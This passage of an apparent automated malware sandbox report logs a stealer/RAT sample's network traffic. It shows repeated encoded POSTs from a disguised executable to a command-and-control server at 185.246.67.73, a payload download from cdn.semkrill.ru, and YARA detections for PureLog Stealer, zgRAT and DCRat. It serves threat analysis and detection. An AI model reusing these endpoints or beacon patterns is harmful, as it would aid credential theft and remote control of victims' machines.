    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 1904
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:28:44.747765064 CET | 1904 | OUT | Data Raw: 55 59 46 57 5b 46 55 54 54 5e 50 59 5b 5a 59 58 59 54 59 59 57 51 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: UYFW[FUTT^PY[ZYXYTYYWQQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-35^%%" )[-454>^/8$U'>8X%*^&: 7^, ]!![ (
Dec 8, 2024 15:28:45.723938942 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:45.957278013 CET | 380 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:28:45 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 152
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 06 13 3a 09 25 43 33 53 3e 5c 2e 5d 27 3c 3b 58 27 3b 23 16 29 30 3b 5f 24 17 30 5e 2c 04 30 0f 21 3f 28 5f 33 04 30 59 20 2c 2c 0a 2e 02 20 5a 06 10 22 07 32 06 2c 02 3c 38 3d 14 31 01 3a 18 21 24 3b 42 27 04 2b 18 3f 2a 04 15 37 11 2c 0a 27 2d 2e 0e 2d 1c 3d 05 32 33 2b 57 25 0c 2c 55 0f 1f 25 09 27 0b 27 1e 22 37 3a 1c 22 30 34 05 25 0b 00 56 22 2f 30 51 2b 2d 2b 06 28 21 28 58 22 32 3c 06 3a 3b 25 5e 2a 22 2f 50 25 3c 20 53 2a 02 2e 54 0d 33 56 52
    Data Ascii: :%C3S>\.]'<;X';#)0;_$0^,0!?(_30Y ,,. Z"2,<8=1:!$;B'+?*7,'-.-=23+W%,U%''"7:"04%V"/0Q+-+(!(X"2<:;%^*"/P%< S*.T3VR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49916 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:44.525981903 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:28:44.872741938 CET | 2584 | OUT | Data Raw: 50 5c 46 56 5e 47 55 50 54 5e 50 59 5b 5f 59 58 59 5d 59 5b 57 51 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: P\FV^GUPT^PY[_YXY]Y[WQQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3>6&!)Z9'%7>[,8U$>1!&;"Y7,;^, ]!![
Dec 8, 2024 15:28:45.853246927 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:46.088808060 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:28:45 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49922 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:46.331614017 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
Dec 8, 2024 15:28:46.685286045 CET | 2584 | OUT | Data Raw: 50 5b 43 5c 5e 43 55 5f 54 5e 50 59 5b 5b 59 52 59 54 59 5e 57 5d 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: P[C\^CU_T^PY[[YRYTY^W]Q^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.'!Z1:5]6994:_78>Y,$'2.]&2\7/?Z/ ]!![ ,
Dec 8, 2024 15:28:47.665875912 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:47.896572113 CET | 151 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:28:47 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49927 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:48.130521059 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2580
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:28:48.482836962 CET | 2580 | OUT | Data Raw: 55 5e 43 57 5e 40 55 54 54 5e 50 59 5b 58 59 53 59 5a 59 5b 57 51 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: U^CW^@UTT^PY[XYSYZY[WQQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Y$.![%9]"#![.-4/^/'>%3-1)#$/+ ]!![
Dec 8, 2024 15:28:49.560025930 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:49.690546989 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:28:49 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49930 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:49.925580025 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:28:50.278917074 CET | 2584 | OUT | Data Raw: 55 58 43 56 5b 47 55 5e 54 5e 50 59 5b 5e 59 53 59 58 59 56 57 51 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: UXCV[GU^T^PY[^YSYXYVWQQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Y0=&$9&! &:$6X78.X/$#26X%+2",(/; ]!![ 8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49934 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:51.087480068 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 1904
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:28:51.438301086 CET | 1904 | OUT | Data Raw: 50 5f 46 50 5e 44 50 54 54 5e 50 59 5b 59 59 5e 59 58 59 59 57 5d 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: P_FP^DPTT^PY[YY^YXYYW]Q]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Y'=.$*%Z!U::$-78>_,/$#&2^%8>"<7[/ ]!![ $
Dec 8, 2024 15:28:52.407707930 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:52.644364119 CET | 380 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:28:52 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 152
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 06 13 39 50 25 1c 20 0a 28 29 39 00 25 2c 0e 01 25 3b 2f 5c 29 09 2f 5c 27 07 3c 5a 38 39 2b 1c 34 02 28 5e 30 03 30 58 22 3c 2f 50 2d 38 20 5a 06 10 21 5b 25 3f 33 12 3c 02 2d 5e 26 5e 25 0a 35 09 15 42 33 3e 34 08 3d 14 3a 5f 23 01 37 1e 32 3d 26 0c 2d 26 3e 5f 26 1e 0e 08 31 1c 2c 55 0f 1f 26 52 24 1c 3c 0c 23 24 25 0c 35 20 09 14 25 0b 2a 51 36 3f 0d 09 2a 2e 3b 07 3f 22 38 1f 20 22 0d 59 2c 2b 25 5d 3d 22 09 1d 30 06 20 53 2a 02 2e 54 0d 33 56 52
    Data Ascii: 9P% ()9%,%;/\)/\'<Z89+4(^00X"</P-8 Z![%?3<-^&^%5B3>4=:_#72=&-&>_&1,U&R$<#$%5 %*Q6?*.;?"8 "Y,+%]="0 S*.T3VR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 49936 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:51.210522890 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:51.560235977 CET | 2584 | OUT | Data Raw: (hex dump omitted)
Dec 8, 2024 15:28:52.535586119 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:52.768261909 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49941 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:53.009546995 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Dec 8, 2024 15:28:53.356987000 CET | 2584 | OUT | Data Raw: (hex dump omitted)
Dec 8, 2024 15:28:54.329621077 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:54.568438053 CET | 151 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49947 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:54.802606106 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:55.154283047 CET | 2584 | OUT | Data Raw: (hex dump omitted)
Dec 8, 2024 15:28:56.121335983 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:56.356427908 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49951 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:56.601273060 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:56.950685024 CET | 2584 | OUT | Data Raw: (hex dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49955 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:57.782557011 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 1904
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:58.138880968 CET | 1904 | OUT | Data Raw: (hex dump omitted)
Dec 8, 2024 15:28:59.171087027 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:59.404311895 CET | 380 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49956 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:57.941849947 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2580
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:58.294572115 CET | 2580 | OUT | Data Raw: (hex dump omitted)
Dec 8, 2024 15:28:59.336906910 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:59.576364994 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.184.109 | 443 | 6036 | C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-08 14:26:58 UTC | 191 | OUT | GET /checker/release/update/SandeLLoCHECKER_Installer-FILES.7z HTTP/1.1
Accept: */*
User-Agent: AdvancedInstaller
Host: cdn.semkrill.ru
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-08 14:27:00 UTC | 889 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:26:59 GMT
Content-Length: 12251984
Connection: close
last-modified: Mon, 01 Apr 2024 16:09:40 GMT
etag: "baf350-6150b3787a349"
strict-transport-security: max-age=31536000;
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nOFIbpOWtT7%2BF978Gb%2B5z26FuqpCg7QJQIWNNuCzCxWTagYRJURWeBDbmx%2FVV8wwQgPEkvKmJ%2FxAbm7UGZGLRKZTmg60sy0xh4TralWQBnEOObFCYBUkhrHu6dDIbnWEauU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eed6efefbed238e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1973&rtt_var=746&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=805&delivery_rate=1479979&cwnd=232&unsent_bytes=0&cid=3a687beca8f19f5f&ts=1290&x=0"
2024-12-08 14:27:00 UTC | 480 | IN | Data Raw: (hex dump omitted)
2024-12-08 14:27:00 UTC | 1369 | IN | Data Raw: (hex dump omitted)
2024-12-08 14:27:00 UTC | 1369 | IN | Data Raw: (hex dump omitted)
2024-12-08 14:27:00 UTC | 1369 | IN | Data Raw: (hex dump omitted)
2024-12-08 14:27:00 UTC | 1369 | IN | Data Raw: (hex dump omitted)
                                                                                                                      Data Ascii: ^L"y4n2VeQ@5/<P;6H`Jua<R#![[H!+#`_O%hn-7QgN#WEe.3DU|e_J1Tn6i$9V|{PNdLHUnA Y5,JTp
                                                                                                                      2024-12-08 14:27:00 UTC1369INData Raw: fb c1 92 d9 49 d2 06 4d ae 56 37 58 21 a3 78 7c 23 ee 29 ec d4 f3 ee e2 36 ab f5 f4 7e c7 68 e3 28 07 87 c2 fd 2b 33 31 06 b3 a3 4b 07 80 50 13 b7 7d 8e d3 87 4d 5a a7 e6 69 8b c9 9e 11 4b bc 25 cf ba 81 c1 db c4 99 3d 01 b3 1a 01 aa 3a fb f5 1f 8f ac 6c 75 e1 4c f0 26 8a 80 f7 0c c7 91 85 55 3e 52 c2 79 e8 e7 62 42 d3 64 22 a1 08 bb 54 a4 9f 72 49 36 94 31 f5 57 5e 00 fe d2 f4 36 2b 52 58 21 35 68 fe a5 6a c6 2f 9a b1 53 75 89 e0 c2 7b 61 b6 f7 03 98 3e 33 9b e1 8a e7 24 e4 19 56 b8 db c7 33 fb 48 5a 85 99 bd c8 75 5b 92 bb 69 7c 9e e0 e3 f7 8a d7 1a 23 6c f5 5f 58 0c bf 5f 15 78 f1 32 cd f8 b4 2a fe 7c 46 d8 c7 28 bc 93 c1 06 14 80 81 e0 b6 cd 73 75 aa 5c 92 a2 7e 54 7d d8 23 66 b8 49 e7 e2 21 a1 b0 53 43 93 be a8 2b 89 7d d9 c9 da 7f 99 22 32 ed 22 6f
                                                                                                                      Data Ascii: IMV7X!x|#)6~h(+31KP}MZiK%=:luL&U>RybBd"TrI61W^6+RX!5hj/Su{a>3$V3HZu[i|#l_X_x2*|F(su\~T}#fI!SC+}"2"o


                                                                                                                      Target ID:0
                                                                                                                      Start time:09:26:53
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\gorkmTnChA.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\gorkmTnChA.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:9'843'712 bytes
                                                                                                                      MD5 hash:E4E1923F51EB61ED20CBBFAB84AB25B5
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:1
                                                                                                                      Start time:09:26:53
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                                                                                                      Imagebase:0x490000
                                                                                                                      File size:3'860'292 bytes
                                                                                                                      MD5 hash:A7645CAC446E39F9961F51E3BB1C0515
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1656268229.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1655715436.000000000688F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
